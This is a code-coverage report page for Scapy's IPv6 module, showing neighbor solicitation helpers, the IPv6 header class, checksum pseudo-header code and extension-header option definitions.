Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.11/site-packages/scapy/layers/inet6.py: 53%

Shortcuts on this page

r m x   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

1815 statements  

1# SPDX-License-Identifier: GPL-2.0-only 

2# This file is part of Scapy 

3# See https://scapy.net/ for more information 

4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp> 

5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net> 

6 

7# Cool history about this file: http://natisbad.org/scapy/index.html 

8 

9 

10""" 

11IPv6 (Internet Protocol v6). 

12""" 

13 

14 

15from hashlib import md5 

16import random 

17import socket 

18import struct 

19from time import gmtime, strftime 

20 

21from scapy.arch import get_if_hwaddr 

22from scapy.as_resolvers import AS_resolver_riswhois 

23from scapy.base_classes import Gen, _ScopedIP 

24from scapy.compat import chb, orb, raw, plain_str, bytes_encode 

25from scapy.consts import WINDOWS, OPENBSD 

26from scapy.config import conf 

27from scapy.data import ( 

28 DLT_IPV6, 

29 DLT_RAW, 

30 DLT_RAW_ALT, 

31 ETHER_ANY, 

32 ETH_P_ALL, 

33 ETH_P_IPV6, 

34 MTU, 

35) 

36from scapy.error import log_runtime, warning 

37from scapy.fields import ( 

38 BitEnumField, 

39 BitField, 

40 ByteEnumField, 

41 ByteField, 

42 DestIP6Field, 

43 FieldLenField, 

44 FlagsField, 

45 IntField, 

46 IP6Field, 

47 LongField, 

48 MACField, 

49 MayEnd, 

50 PacketLenField, 

51 PacketListField, 

52 ShortEnumField, 

53 ShortField, 

54 SourceIP6Field, 

55 StrField, 

56 StrFixedLenField, 

57 StrLenField, 

58 X3BytesField, 

59 XBitField, 

60 XByteField, 

61 XIntField, 

62 XShortField, 

63) 

64from scapy.layers.inet import ( 

65 _ICMPExtensionField, 

66 _ICMPExtensionPadField, 

67 _ICMP_extpad_post_dissection, 

68 IP, 

69 IPTools, 

70 TCP, 

71 TCPerror, 

72 TracerouteResult, 

73 UDP, 

74 UDPerror, 

75) 

76from scapy.layers.l2 import ( 

77 CookedLinux, 

78 Ether, 

79 GRE, 

80 Loopback, 

81 SNAP, 

82 SourceMACField, 

83) 

84from scapy.packet import bind_layers, Packet, Raw 

85from scapy.sendrecv import sendp, sniff, sr, srp1 

86from scapy.supersocket import SuperSocket 

87from scapy.utils import checksum, strxor 

88from scapy.pton_ntop import inet_pton, inet_ntop 

89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ 

90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ 

91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo 

92from scapy.volatile import RandInt, RandShort 

93 

94# Typing 

95from typing import ( 

96 Optional, 

97) 

98 

# This module cannot work without IPv6 support in the socket module.
if not socket.has_ipv6:
    raise socket.error("can't use AF_INET6, IPv6 is disabled")

# Define the protocol constants when the socket module lacks them.
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = getattr(socket, "IPPROTO_IPV6", 41)
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
socket.IPPROTO_IPIP = getattr(socket, "IPPROTO_IPIP", 4)

if conf.route6 is None:
    # unused import, only to initialize conf.route6
    import scapy.route6  # noqa: F401

##########################
#  Neighbor cache stuff  #
##########################

conf.netcache.new_cache("in6_neighbor", 120)

117 

118 

@conf.commands.register
def neighsol(addr, src, iface, timeout=1, chainCC=0):
    """Send an ICMPv6 Neighbor Solicitation and return the answer, if any.

    The solicitation targets 'addr' and is sent on 'iface' to the
    solicited-node multicast address derived from 'addr' (and to the
    matching multicast MAC address). 'src' is used as the source IPv6
    address; the source MAC address is the hardware address of 'iface',
    which is also carried in a Source Link-Layer Address option.

    :param addr: IPv6 address of the neighbor to resolve
    :param src: source IPv6 address of the message
    :param iface: interface the message is sent on
    :param timeout: time to wait for an answer, 1 second by default
    :param chainCC: handed over unchanged to srp1()
    :return: the answer (ethernet frame), or None if no answer is gathered
    """
    solicited_node = in6_getnsma(inet_pton(socket.AF_INET6, addr))
    ip_dst = inet_ntop(socket.AF_INET6, solicited_node)
    mac_dst = in6_getnsmac(solicited_node)
    mac_src = get_if_hwaddr(iface)

    request = (
        Ether(dst=mac_dst, src=mac_src) /
        IPv6(dst=ip_dst, src=src, hlim=255) /
        ICMPv6ND_NS(tgt=addr) /
        ICMPv6NDOptSrcLLAddr(lladdr=mac_src)
    )
    return srp1(request, type=ETH_P_IPV6, iface=iface, timeout=timeout,
                verbose=0, chainCC=chainCC)

146 

147 

@conf.commands.register
def getmacbyip6(ip6, chainCC=0):
    # type: (str, int) -> Optional[str]
    """
    Return the MAC address of the next hop used to reach an IPv6 address.

    Multicast addresses are mapped directly to their multicast MAC address.
    Otherwise the route is looked up, the "in6_neighbor" cache is consulted
    and, on a cache miss, a Neighbor Solicitation is sent with neighsol().
    A successful resolution is stored in the cache.

    (chainCC parameter value ends up being passed to sending function
     used to perform the resolution, if needed)

    :return: the MAC address, or None when the resolution got no answer

    .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4.
    """
    # Sanitize the IP
    if isinstance(ip6, Net6):
        ip6 = str(ip6)

    # Multicast: no resolution needed
    if in6_ismaddr(ip6):
        return in6_getnsmac(inet_pton(socket.AF_INET6, ip6))

    iff, a, nh = conf.route6.route(ip6)
    if iff == conf.loopback_name:
        return "ff:ff:ff:ff:ff:ff"

    # Resolve the next hop instead of the destination when there is one
    target = ip6 if nh == '::' else nh

    cached_mac = conf.netcache.in6_neighbor.get(target)
    if cached_mac:
        return cached_mac

    res = neighsol(target, a, iff, chainCC=chainCC)
    if res is None:
        return None

    if ICMPv6NDOptDstLLAddr in res:
        mac = res[ICMPv6NDOptDstLLAddr].lladdr
    else:
        mac = res.src
    conf.netcache.in6_neighbor[target] = mac
    return mac

194 

195 

196############################################################################# 

197############################################################################# 

198# IPv6 Class # 

199############################################################################# 

200############################################################################# 

201 

# Next Header value -> human readable name (used by the "nh" enum fields)
ipv6nh = {
    0: "Hop-by-Hop Option Header",
    4: "IP",
    6: "TCP",
    17: "UDP",
    41: "IPv6",
    43: "Routing Header",
    44: "Fragment Header",
    47: "GRE",
    50: "ESP Header",
    51: "AH Header",
    58: "ICMPv6",
    59: "No Next Header",
    60: "Destination Option Header",
    112: "VRRP",
    132: "SCTP",
    135: "Mobility Header",
}

# Next Header value -> name of the class used for the payload
ipv6nhcls = {
    0: "IPv6ExtHdrHopByHop",
    4: "IP",
    6: "TCP",
    17: "UDP",
    43: "IPv6ExtHdrRouting",
    44: "IPv6ExtHdrFragment",
    50: "ESP",
    51: "AH",
    58: "ICMPv6Unknown",
    59: "Raw",
    60: "IPv6ExtHdrDestOpt",
}

230 

231 

class IP6ListField(StrField):
    """Field holding a list of IPv6 addresses, 16 bytes each on the wire.

    The amount of data to dissect is given either by 'length_from' (a
    number of bytes) or by 'count_from' (a number of addresses);
    'length_from' takes precedence when both are set.
    """
    __slots__ = ["count_from", "length_from"]
    islist = 1

    def __init__(self, name, default, count_from=None, length_from=None):
        StrField.__init__(self, name, [] if default is None else default)
        self.count_from = count_from
        self.length_from = length_from

    def i2len(self, pkt, i):
        """Length in bytes of the list once built."""
        return len(i) * 16

    def i2count(self, pkt, i):
        """Number of addresses in the list (0 if 'i' is not a list)."""
        return len(i) if isinstance(i, list) else 0

    def getfield(self, pkt, s):
        """Dissect addresses from 's'; return (remaining bytes, list)."""
        max_count = byte_len = None
        if self.length_from is not None:
            byte_len = self.length_from(pkt)
        elif self.count_from is not None:
            max_count = self.count_from(pkt)

        if byte_len is None:
            pending, trailer = s, b""
        else:
            pending, trailer = s[:byte_len], s[byte_len:]

        addresses = []
        while pending and (max_count is None or max_count > 0):
            if max_count is not None:
                max_count -= 1
            addresses.append(inet_ntop(socket.AF_INET6, pending[:16]))
            pending = pending[16:]
        return pending + trailer, addresses

    def i2m(self, pkt, x):
        """Build the wire format; names that are not addresses are resolved."""
        packed = []
        for item in x:
            try:
                encoded = inet_pton(socket.AF_INET6, item)
            except Exception:
                resolved = socket.getaddrinfo(item, None, socket.AF_INET6)[0][-1][0]  # noqa: E501
                encoded = inet_pton(socket.AF_INET6, resolved)
            packed.append(encoded)
        return b"".join(packed)

    def i2repr(self, pkt, x):
        if x is None:
            return "[]"
        return "[ %s ]" % (", ".join('%s' % item for item in x))

291 

292 

class _IPv6GuessPayload:
    name = "Dummy class that implements guess_payload_class() for IPv6"

    def default_payload_class(self, p):
        """Pick the class used to dissect the payload 'p'.

        The choice is driven by the 'nh' (Next Header) value of the layer,
        refined by the first bytes of 'p' for ICMPv6, Mobile IPv6 and
        routing headers. Bytes of 'p' are only read after checking that
        they are present, so a short payload never raises IndexError.

        :param p: raw bytes of the payload
        :return: the class to use, Raw when nothing better is known
        """
        if self.nh == 58:  # ICMPv6
            if not p:
                # no type byte to look at
                return Raw
            t = orb(p[0])
            if len(p) > 2 and (t == 139 or t == 140):  # Node Info Query
                return _niquery_guesser(p)
            if len(p) >= icmp6typesminhdrlen.get(t, float("inf")):  # Other ICMPv6 messages # noqa: E501
                if t == 130 and len(p) >= 28:
                    # RFC 3810 - 8.1. Query Version Distinctions
                    return ICMPv6MLQuery2
                return icmp6typescls.get(t, Raw)
            return Raw
        elif self.nh == 135 and len(p) > 3:  # Mobile IPv6
            return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
        elif self.nh == 43 and len(p) > 2 and orb(p[2]) == 4:
            # Segment Routing header (routing type 4); the length check
            # keeps truncated headers on the generic path below
            return IPv6ExtHdrSegmentRouting
        return ipv6nhcls.get(self.nh, Raw)

312 

313 

class IPv6(_IPv6GuessPayload, Packet, IPTools):
    """IPv6 header."""
    name = "IPv6"
    fields_desc = [BitField("version", 6, 4),
                   BitField("tc", 0, 8),
                   BitField("fl", 0, 20),
                   ShortField("plen", None),
                   ByteEnumField("nh", 59, ipv6nh),
                   ByteField("hlim", 64),
                   SourceIP6Field("src"),
                   DestIP6Field("dst", "::1")]

    def route(self):
        """Used to select the L2 address"""
        dst = self.dst
        scope = None
        if isinstance(dst, (Net6, _ScopedIP)):
            scope = dst.scope
        if isinstance(dst, (Gen, list)):
            # several destinations: route according to the first one
            dst = next(iter(dst))
        return conf.route6.route(dst, dev=scope)

    def mysummary(self):
        return "%s > %s (%i)" % (self.src, self.dst, self.nh)

    def post_build(self, p, pay):
        """Append the payload and fill in 'plen' when it was left unset."""
        p += pay
        if self.plen is None:
            # the payload length excludes the 40-byte fixed header
            tmp_len = len(p) - 40
            p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
        return p

    def extract_padding(self, data):
        """Extract the IPv6 payload

        :param data: bytes following the IPv6 header
        :return: a (payload, padding) tuple
        """

        if self.plen == 0 and self.nh == 0 and len(data) >= 8:
            # Extract Hop-by-Hop extension length
            hbh_len = 8 + orb(data[1]) * 8

            # Extract length from the Jumbogram option
            # Note: the following algorithm takes advantage of the Jumbo
            #       option mandatory alignment (4n + 2, RFC2675 Section 2)
            jumbo_len = None
            # Only look inside the Hop-by-Hop header, and never past the
            # bytes actually available. A Jumbo option is 6 bytes long
            # (type, length, 32-bit value), hence the "- 5" bound.
            scan_end = min(hbh_len, len(data))
            for offset in range(2, scan_end - 5, 4):
                if orb(data[offset]) == 0xc2:  # Jumbo option
                    # the length is carried in network byte order
                    jumbo_len = struct.unpack(
                        "!I", data[offset + 2:offset + 6]
                    )[0]
                    break

            if jumbo_len is None:
                log_runtime.info("Scapy did not find a Jumbo option")
                jumbo_len = 0

            # NOTE(review): RFC 2675 seems to define the Jumbo length as
            # already including the extension headers - confirm whether
            # adding hbh_len here is intended.
            tmp_len = hbh_len + jumbo_len
        else:
            tmp_len = self.plen

        return data[:tmp_len], data[tmp_len:]

    def hashret(self):
        """Return the bytes used to match requests with their answers."""
        if self.nh == 58 and isinstance(self.payload, _ICMPv6):
            if self.payload.type < 128:
                # ICMPv6 error: hash on the packet it quotes
                return self.payload.payload.hashret()
            elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
                return struct.pack("B", self.nh) + self.payload.hashret()

        if not conf.checkIPinIP and self.nh in [4, 41]:  # IP, IPv6
            return self.payload.hashret()

        nh = self.nh
        sd = self.dst
        ss = self.src
        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
            # With routing header, the destination is the last
            # address of the IPv6 list if segleft > 0
            nh = self.payload.nh
            try:
                sd = self.addresses[-1]
            except IndexError:
                sd = '::1'
            # TODO: big bug with ICMPv6 error messages as the destination of IPerror6  # noqa: E501
            #       could be anything from the original list ...
            sd = inet_pton(socket.AF_INET6, sd)
            for a in self.addresses:
                a = inet_pton(socket.AF_INET6, a)
                sd = strxor(sd, a)
            sd = inet_ntop(socket.AF_INET6, sd)

        if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            # With segment routing header (rh == 4), the destination is
            # the first address of the IPv6 addresses list
            try:
                sd = self.addresses[0]
            except IndexError:
                sd = self.dst

        if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
            nh = self.payload.nh

        if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
            nh = self.payload.nh

        if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
            foundhao = None
            for o in self.payload.options:
                if isinstance(o, HAO):
                    foundhao = o
            if foundhao:
                # the Home Address option carries the address to hash on
                ss = foundhao.hoa
            nh = self.payload.nh  # XXX what if another extension follows ?

        if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
            sd = inet_pton(socket.AF_INET6, sd)
            ss = inet_pton(socket.AF_INET6, ss)
            return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()  # noqa: E501
        else:
            return struct.pack("B", nh) + self.payload.hashret()

    def answers(self, other):
        """Tell whether self (a reply) answers 'other' (a request)."""
        if not conf.checkIPinIP:  # skip IP in IP and IPv6 in IP
            if self.nh in [4, 41]:
                return self.payload.answers(other)
            if isinstance(other, IPv6) and other.nh in [4, 41]:
                return self.answers(other.payload)
            if isinstance(other, IP) and other.proto in [4, 41]:
                return self.answers(other.payload)
        if not isinstance(other, IPv6):  # self is reply, other is request
            return False
        if conf.checkIPaddr:
            # ss = inet_pton(socket.AF_INET6, self.src)
            sd = inet_pton(socket.AF_INET6, self.dst)
            os = inet_pton(socket.AF_INET6, other.src)
            od = inet_pton(socket.AF_INET6, other.dst)
            # request was sent to a multicast address (other.dst)
            # Check reply destination addr matches request source addr (i.e
            # sd == os) except when reply is multicasted too
            # XXX test mcast scope matching ?
            if in6_ismaddr(other.dst):
                if in6_ismaddr(self.dst):
                    if ((od == sd) or
                        (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):  # noqa: E501
                        return self.payload.answers(other.payload)
                    return False
                if (os == sd):
                    return self.payload.answers(other.payload)
                return False
            elif (sd != os):  # or ss != od): <- removed for ICMP errors
                return False
        if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:  # noqa: E501
            # ICMPv6 Error message -> generated by IPv6 packet
            # Note : at the moment, we jump the ICMPv6 specific class
            # to call answers() method of erroneous packet (over
            # initial packet). There can be cases where an ICMPv6 error
            # class could implement a specific answers method that perform
            # a specific task. Currently, don't see any use ...
            return self.payload.payload.answers(other)
        elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
            return self.payload.answers(other.payload)
        elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
            return self.payload.answers(other.payload.payload)
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):  # noqa: E501
            return self.payload.answers(other.payload.payload)  # Buggy if self.payload is a IPv6ExtHdrRouting  # noqa: E501
        elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
            return self.payload.answers(other.payload.payload)
        elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):  # BU in reply to BRR, for instance  # noqa: E501
            return self.payload.payload.answers(other.payload)
        else:
            if (self.nh != other.nh):
                return False
            return self.payload.answers(other.payload)

491 

492 

class IPv46(IP, IPv6):
    """
    Dispatcher class selecting between IP and IPv6, used to detect the
    IP version while parsing Raw IP pcap files.
    """
    name = "IPv4/6"

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        # With data, the upper nibble of the first byte gives the version;
        # without data, the 'version' keyword argument decides.
        if _pkt:
            wants_v6 = orb(_pkt[0]) >> 4 == 6
        else:
            wants_v6 = kargs.get("version") == 6
        return IPv6 if wants_v6 else IP

508 

509 

def inet6_register_l3(l2, l3):
    """
    Resolve the default L2 destination address of an IPv6 packet.

    :param l2: the layer 2 packet (not used)
    :param l3: the IPv6 packet whose 'dst' is resolved
    :return: the result of getmacbyip6() for the destination
    """
    destination = l3.dst
    return getmacbyip6(destination)

515 

516 

517conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) 

518 

519 

class IPerror6(IPv6):
    """IPv6 header quoted inside an ICMPv6 error message."""
    name = "IPv6 in ICMPv6"

    @staticmethod
    def _same_leading_bytes(selfup, otherup):
        """Compare the raw bytes of both layers over their common length."""
        s1 = raw(selfup)
        s2 = raw(otherup)
        tmp_len = min(len(s1), len(s2))
        return s1[:tmp_len] == s2[:tmp_len]

    def answers(self, other):
        """Tell whether this quoted packet matches the packet 'other'.

        The match requires an enclosing ICMPv6 message of type < 128,
        identical source addresses, identical destination addresses
        (unless the request has a Routing Header) and upper layers whose
        raw bytes agree over their common length. TCP fields that differ
        because of MSS clamping are blanked during the comparison and
        always restored afterwards, even if building the packets fails.
        """
        if not isinstance(other, IPv6):
            return False
        sd = inet_pton(socket.AF_INET6, self.dst)
        ss = inet_pton(socket.AF_INET6, self.src)
        od = inet_pton(socket.AF_INET6, other.dst)
        os = inet_pton(socket.AF_INET6, other.src)

        # Make sure that the ICMPv6 error is related to the packet scapy sent
        if not (isinstance(self.underlayer, _ICMPv6) and
                self.underlayer.type < 128):
            return False

        # find upper layer for self (possible citation)
        selfup = self.payload
        while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
            selfup = selfup.payload

        # find upper layer for other (initial packet). Also look for RH
        otherup = other.payload
        request_has_rh = False
        while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
            if isinstance(otherup, IPv6ExtHdrRouting):
                request_has_rh = True
            otherup = otherup.payload

        # Basic case: both addresses match. When the request has a RH,
        # the destination address is not checked.
        if not (ss == os and (sd == od or request_has_rh)):
            return False

        # Let's deal with possible MSS Clamping
        seems_clamped = (isinstance(selfup, TCP) and
                         isinstance(otherup, TCP) and
                         selfup.options != otherup.options)
        if not seems_clamped:
            return self._same_leading_bytes(selfup, otherup)

        # Save fields modified by MSS clamping
        saved = [(layer, layer.options, layer.chksum, layer.dataofs)
                 for layer in (otherup, selfup)]
        try:
            # Nullify them
            for layer in (otherup, selfup):
                layer.options = []
                layer.chksum = 0
                layer.dataofs = 0
            return self._same_leading_bytes(selfup, otherup)
        finally:
            # recall saved values, whatever happened above
            for layer, options, chksum, dataofs in saved:
                layer.options = options
                layer.chksum = chksum
                layer.dataofs = dataofs

    def mysummary(self):
        return Packet.mysummary(self)

597 

598 

599############################################################################# 

600############################################################################# 

601# Upper Layer Checksum computation # 

602############################################################################# 

603############################################################################# 

604 

class PseudoIPv6(Packet):
    """IPv6 pseudo-header used for upper-layer checksum computation."""
    name = "Pseudo IPv6 Header"
    fields_desc = [
        IP6Field("src", "::"),
        IP6Field("dst", "::"),
        IntField("uplen", None),
        BitField("zero", 0, 24),
        ByteField("nh", 0),
    ]

612 

613 

def in6_pseudoheader(nh, u, plen):
    # type: (int, Packet, int) -> Optional[PseudoIPv6]
    """
    Build a PseudoIPv6 instance as specified in RFC 2460 8.1

    This function operates by filling a pseudo header class instance
    (PseudoIPv6) with:
    - Next Header value
    - the address of _final_ destination (if some Routing Header with
      non-zero segleft field is present in underlayer classes, its last
      address is used; for a Segment Routing Header, its first address)
    - the address of _real_ source (basically the source address of an
      IPv6 class instance available in the underlayer, or the home address
      of a HAO option if some Destination Option header found in the
      underlayer includes one, whatever other options surround it)
    - the upper layer length given in 'plen'

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param plen: the length of the upper layer and payload
    :return: the pseudo header, or None when no IPv6 underlayer is found
    """
    ph6 = PseudoIPv6()
    ph6.nh = nh
    final_dst = None
    home_addr = None
    while u is not None and not isinstance(u, IPv6):
        if (isinstance(u, IPv6ExtHdrRouting) and
                u.segleft != 0 and len(u.addresses) != 0 and
                final_dst is None):
            final_dst = u.addresses[-1]
        elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
                u.segleft != 0 and len(u.addresses) != 0 and
                final_dst is None):
            final_dst = u.addresses[0]
        elif isinstance(u, IPv6ExtHdrDestOpt):
            # Scan every option, as IPv6.hashret() does: padding options
            # next to the HAO must not hide it.
            for opt in u.options:
                if isinstance(opt, HAO):
                    home_addr = opt.hoa
        u = u.underlayer
    if u is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return None
    ph6.src = u.src if home_addr is None else home_addr
    ph6.dst = u.dst if final_dst is None else final_dst
    ph6.uplen = plen
    return ph6

669 

670 

def in6_chksum(nh, u, p):
    """
    Compute the upper-layer checksum, as specified in RFC 2460 - 8.1
    Upper-Layer Checksums.

    See also `.in6_pseudoheader`

    :param nh: value of upper layer protocol
    :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
        provided with all under layers (IPv6 and all extension headers,
        for example)
    :param p: the payload of the upper layer provided as a string
    :return: the checksum, or 0 when no pseudo header could be built
    """
    pseudo_header = in6_pseudoheader(nh, u, len(p))
    if pseudo_header is None:
        return 0
    return checksum(raw(pseudo_header) + p)

688 

689 

690############################################################################# 

691############################################################################# 

692# Extension Headers # 

693############################################################################# 

694############################################################################# 

695 

# Next Header value -> class used for that protocol when it is quoted
# inside an ICMPv6 error (see _IPv6ExtHdr.guess_payload_class)
nh_clserror = {
    socket.IPPROTO_TCP: TCPerror,
    socket.IPPROTO_UDP: UDPerror,
}

698 

699 

700# Inherited by all extension header classes 

class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    """Base class of the IPv6 extension headers."""
    name = 'Abstract IPv6 Option Header'
    aliastypes = [IPv6]

    def guess_payload_class(self, payload):
        # When this header sits somewhere above an IPerror6 layer, TCP and
        # UDP payloads are dissected with their "error" variants.
        if self.nh in nh_clserror:
            layer = self.underlayer
            while layer:
                if isinstance(layer, IPerror6):
                    return nh_clserror[self.nh]
                layer = layer.underlayer
        return super(_IPv6ExtHdr, self).guess_payload_class(payload)

713 

714 

715# IPv6 options for Extension Headers # 

716 

717_hbhopts = {0x00: "Pad1", 

718 0x01: "PadN", 

719 0x04: "Tunnel Encapsulation Limit", 

720 0x05: "Router Alert", 

721 0x06: "Quick-Start", 

722 0xc2: "Jumbo Payload", 

723 0xc9: "Home Address Option"} 

724 

725 

class _OTypeField(ByteEnumField):
    """
    Modified ByteEnumField that displays information regarding the IPv6
    option based on its option type value (What should be done by nodes
    that process the option if they do not understand it ...)

    It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
    """
    # meaning of the two highest-order bits of the option type
    pol = {
        0x00: "00: skip",
        0x40: "01: discard",
        0x80: "10: discard+ICMP",
        0xC0: "11: discard+ICMP not mcast",
    }

    # meaning of the third highest-order bit of the option type
    enroutechange = {
        0x00: "0: Don't change en-route",
        0x20: "1: May change en-route",
    }

    def i2repr(self, pkt, x):
        label = self.i2s.get(x, repr(x))
        details = (label, self.pol[x & 0xC0], self.enroutechange[x & 0x20])
        return "%s [%s, %s]" % details

747 

748 

class HBHOptUnknown(Packet):  # IPv6 Hop-By-Hop Option
    """Generic option, also used to dispatch to the known option classes."""
    name = "Scapy6 Unknown Option"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):  # By default, no alignment requirement
        """
        As specified in section 4.2 of RFC 2460, every option has
        an alignment requirement usually expressed xn+y, meaning
        the Option Type must appear at an integer multiple of x octets
        from the start of the header, plus y octets.

        This function is given the current position from the
        start of the header and returns the required padding length.
        """
        return 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        if not _pkt:
            return cls
        # the first byte is the option type
        return _hbhoptcls.get(orb(_pkt[0]), cls)

    def extract_padding(self, p):
        # everything after the option belongs to the following options
        return b"", p

778 

779 

class Pad1(Packet):  # IPv6 Hop-By-Hop Option
    """Padding option made of the option type byte only."""
    name = "Pad1"
    fields_desc = [
        _OTypeField("otype", 0x00, _hbhopts),
    ]

    def alignment_delta(self, curpos):  # No alignment requirement
        return 0

    def extract_padding(self, p):
        # nothing after the type byte belongs to this option
        return b"", p

789 

790 

class PadN(Packet):  # IPv6 Hop-By-Hop Option
    """Padding option with a length byte and 'optlen' bytes of data."""
    name = "PadN"
    fields_desc = [
        _OTypeField("otype", 0x01, _hbhopts),
        FieldLenField("optlen", None, length_of="optdata", fmt="B"),
        StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen),
    ]

    def alignment_delta(self, curpos):  # No alignment requirement
        return 0

    def extract_padding(self, p):
        # bytes after the option are handed back for the next options
        return b"", p

803 

804 

class RouterAlert(Packet):  # RFC 2711 - IPv6 Hop-By-Hop Option
    """Router Alert option."""
    name = "Router Alert"
    fields_desc = [
        _OTypeField("otype", 0x05, _hbhopts),
        ByteField("optlen", 2),
        ShortEnumField(
            "value", None,
            {
                0: "Datagram contains a MLD message",
                1: "Datagram contains RSVP message",
                2: "Datagram contains an Active Network message",
                68: "NSIS NATFW NSLP",
                69: "MPLS OAM",
                65535: "Reserved",
            },
        ),
    ]
    # TODO : Check IANA has not defined new values for value field of RouterAlertOption  # noqa: E501
    # TODO : Now that we have that option, we should do something in MLD class that need it  # noqa: E501
    # TODO : IANA has defined ranges of values which can't be easily represented here.  # noqa: E501
    #        iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml

    def alignment_delta(self, curpos):  # alignment requirement : 2n+0
        modulus, remainder = 2, 0
        # smallest padding bringing curpos to a "modulus * n + remainder"
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        return b"", p

829 

830 

class RplOption(Packet):  # RFC 6553 - RPL Option
    """RPL option: three flag bits, an instance id and a sender rank."""
    name = "RPL Option"
    fields_desc = [
        _OTypeField("otype", 0x63, _hbhopts),
        ByteField("optlen", 4),
        BitField("Down", 0, 1),
        BitField("RankError", 0, 1),
        BitField("ForwardError", 0, 1),
        BitField("unused", 0, 5),
        XByteField("RplInstanceId", 0),
        XShortField("SenderRank", 0),
    ]

    def alignment_delta(self, curpos):  # alignment requirement : 2n+0
        modulus, remainder = 2, 0
        # smallest padding bringing curpos to a "modulus * n + remainder"
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        return b"", p

850 

851 

class Jumbo(Packet):  # IPv6 Hop-By-Hop Option
    """Jumbo Payload option carrying a 32-bit payload length."""
    name = "Jumbo Payload"
    fields_desc = [
        _OTypeField("otype", 0xC2, _hbhopts),
        ByteField("optlen", 4),
        IntField("jumboplen", None),
    ]

    def alignment_delta(self, curpos):  # alignment requirement : 4n+2
        modulus, remainder = 4, 2
        # smallest padding bringing curpos to a "modulus * n + remainder"
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        return b"", p

866 

867 

class HAO(Packet):  # IPv6 Destination Options Header Option
    """Home Address option carrying one IPv6 address ('hoa')."""
    name = "Home Address Option"
    fields_desc = [
        _OTypeField("otype", 0xC9, _hbhopts),
        ByteField("optlen", 16),
        IP6Field("hoa", "::"),
    ]

    def alignment_delta(self, curpos):  # alignment requirement : 8n+6
        modulus, remainder = 8, 6
        # smallest padding bringing curpos to a "modulus * n + remainder"
        return (remainder - curpos) % modulus

    def extract_padding(self, p):
        return b"", p

882 

883 

# Option type -> class implementing the option (see
# HBHOptUnknown.dispatch_hook)
_hbhoptcls = {
    0x00: Pad1,
    0x01: PadN,
    0x05: RouterAlert,
    0x63: RplOption,
    0xC2: Jumbo,
    0xC9: HAO,
}

890 

891 

892# Hop-by-Hop Extension Header # 

893 

class _OptionsField(PacketListField):
    """List of options, padded automatically at build time.

    'curpos' is the offset of the field from the start of the header; it
    is the starting point used to honour each option's alignment.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, *args, **kargs):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, *args, **kargs)

    def i2len(self, pkt, i):
        # the length accounts for the padding added by i2m()
        return len(self.i2m(pkt, i))

    def i2m(self, pkt, x):
        """Build the options, inserting padding unless autopad is off."""
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            return b"".join(map(bytes, x))

        def padding(count):
            # Pad1 fills a single byte, PadN anything longer
            if count == 0:
                return b""
            if count == 1:
                return raw(Pad1())
            return raw(PadN(optdata=b'\x00' * (count - 2)))

        position = self.curpos
        chunks = []
        for option in x:
            gap = option.alignment_delta(position)
            chunks.append(padding(gap))
            encoded = raw(option)
            chunks.append(encoded)
            position += gap + len(encoded)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        chunks.append(padding(-position % 8))
        return b"".join(chunks)

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val)

942 

943 

